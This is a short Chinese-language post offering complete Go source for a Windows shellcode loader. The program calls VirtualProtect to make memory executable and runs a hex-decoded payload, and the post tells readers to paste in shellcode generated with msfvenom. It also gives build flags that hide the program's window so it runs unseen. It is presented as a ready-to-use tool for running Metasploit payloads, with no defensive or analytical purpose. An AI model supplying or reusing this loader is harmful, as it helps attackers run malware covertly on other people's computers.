go加载shellcode示例源码

整理了下网上的代码，最后合并到一个代码文件即可使用，无需额外的包

package main

import (
	"encoding/hex"
	"fmt"
	"os"
	"os/signal"
	"syscall"
	"unsafe"
)

var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")

func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
	ret, _, _ := procVirtualProtect.Call(
		uintptr(lpAddress),
		uintptr(dwSize),
		uintptr(flNewProtect),
		uintptr(lpflOldProtect))
	return ret > 0
}

func Run(shellcode []byte) {
	f := func() {}
	var oldfperms uint32
	if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {}
	**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&shellcode))
	var oldshellcodeperms uint32
	if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&shellcode))), uintptr(len(shellcode)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {}
	f()
}

func main() {
	c := make(chan os.Signal)
	signal.Notify(c)
	go func() {
		hexStr := "fc4883e4...56ffd5"
		shellcode, err := hex.DecodeString(hexStr)
		if err != nil {
			os.Exit(1)
		}
		Run(shellcode)
	}()
	<-c
}

在hexStr处粘贴上msfvenom生成的hex格式shellcode字符串，编译运行即可

如果要隐藏运行窗口的话，需要在编译的时候使用以下参数

go build -ldflags "-s -w -H=windowsgui" main.go